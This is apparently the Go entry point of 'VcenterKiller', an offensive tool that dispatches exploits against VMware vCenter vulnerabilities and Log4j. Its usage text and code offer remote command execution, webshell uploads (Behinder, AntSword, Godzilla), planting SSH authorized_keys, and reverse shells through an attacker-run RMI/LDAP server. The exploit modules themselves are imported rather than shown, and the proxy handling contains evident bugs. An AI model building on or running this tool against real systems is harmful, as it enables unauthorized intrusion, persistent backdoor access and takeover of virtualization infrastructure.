-
Notifications
You must be signed in to change notification settings - Fork 164
/
main.go
executable file
·198 lines (183 loc) · 4.14 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
package main
import (
"GO_VCENTER/src/c22954"
"GO_VCENTER/src/c22972"
"GO_VCENTER/src/c_21972"
"GO_VCENTER/src/c_21985"
"GO_VCENTER/src/c_22005"
"GO_VCENTER/src/log4jcenter"
"flag"
"fmt"
"io/ioutil"
url_parse "net/url"
"os"
)
// 1
var (
h bool
url string
filename string
cve string
command string
proxy string
exp_type string
rmi string
)
func usage() {
fmt.Println(`Usage of main.exe:
-u url
you target, example: https://192.168.1.1
-m module
you selected cve code, example: 21972 or 22005 or 21985 or log4center
-c command
you want execute command, example: "whoami"
-f filename
to upload webshell, expamle: behinder.jsp or antsword.jsp or gozllia.jsp
-t attack mode
your attack mode, example: use "ssh" to get ssh shell, not webshell, use -r rmi://xx/xx to get reverseshell
-r rmi server
your ldap & rmi server
-proxy ProxyServer`)
}
func banner() {
ban := `
__ __ _ _ ___ _ _
\ \ / /__ ___ _ __ | |_ ___ _ __ | |/ (_) | | ___ _ __
\ \ / / __/ _ \ '_ \| __/ _ \ '__| | ' /| | | |/ _ \ '__|
\ V / (_| __/ | | | || __/ | | . \| | | | __/ |
\_/ \___\___|_| |_|\__\___|_| |_|\_\_|_|_|\___|_| by schira4396
`
fmt.Println(ban)
}
func main() {
flag.StringVar(&url, "u", "", "your target")
flag.StringVar(&filename, "f", "", "filename")
flag.StringVar(&cve, "m", "", "select cve")
flag.StringVar(&command, "c", "", "command")
flag.StringVar(&exp_type, "t", "", "CVE-2021-21972 Module")
flag.StringVar(&rmi, "r", "", "rmi server address")
flag.StringVar(&rmi, "proxy", "", "proxy server, support http and socks5")
flag.Usage = usage
flag.Parse()
banner()
if len(os.Args) == 3 {
usage()
os.Exit(0)
}
if url == "" || cve == "" {
usage()
os.Exit(0)
}
fmt.Println("[*] url: " + url)
switch cve {
case "22005":
{
if checkProxyServer(proxy) == true {
c_22005.Proxy_server = proxy
} else {
c_22005.Proxy_server = ""
}
c_22005.Test(url, filename)
}
case "21985":
{
if checkProxyServer(proxy) == true {
c_21985.Proxy_server = proxy
} else {
c_21985.Proxy_server = ""
}
if exp_type == "rshell" {
c_21985.Exploit(url, rmi)
} else if exp_type == "" {
c_21985.Attack(url, command)
} else {
fmt.Println("\"" + exp_type + "\"" + " is an incorrect parameter.")
}
}
case "21972":
{
if checkProxyServer(proxy) == true {
c_21972.Proxy_server = proxy
} else {
c_21972.Proxy_server = ""
}
t, err := ioutil.ReadFile(filename)
_ = err
fmt.Println(string(t))
if exp_type == "ssh" {
c_21972.Upload_ssh_authorized_keys(url, string(t))
} else if exp_type == "" {
c_21972.Upload_windows_shell(url, string(t))
c_21972.Upload_linux_shell(url, string(t))
} else {
fmt.Println("\"" + exp_type + "\"" + " is an incorrect parameter.")
}
}
case "log4center":
{
if checkProxyServer(proxy) == true {
log4jcenter.Proxy_server = proxy
} else {
log4jcenter.Proxy_server = ""
}
if exp_type == "scan" {
log4jcenter.StartScan(url)
} else if exp_type == "rshell" {
if rmi != "" {
log4jcenter.StartExploit(url, rmi)
} else {
usage()
}
} else if exp_type == "exec" {
if command == "" {
usage()
os.Exit(0)
} else {
go log4jcenter.Start_server()
log4jcenter.Execc(url, rmi, command)
}
} else {
fmt.Println("\"" + exp_type + "\"" + " is an incorrect parameter.")
}
}
case "22954":
{
if checkProxyServer(proxy) == true {
c22954.Proxy_server = proxy
} else {
c22954.Proxy_server = ""
}
if command != "" {
c22954.Start(url, command)
} else {
usage()
}
}
case "22972":
{
if checkProxyServer(proxy) == true {
c22972.Proxy_server = proxy
} else {
c22972.Proxy_server = ""
}
c22972.Start(url, "", "22972")
}
case "31656":
{
if checkProxyServer(proxy) == true {
c22972.Proxy_server = proxy
} else {
c22972.Proxy_server = ""
}
c22972.Start(url, "", "31656")
}
}
}
func checkProxyServer(Proxy_url string) bool {
_, err := url_parse.Parse(Proxy_url)
if err != nil {
return true
} else {
return false
}
}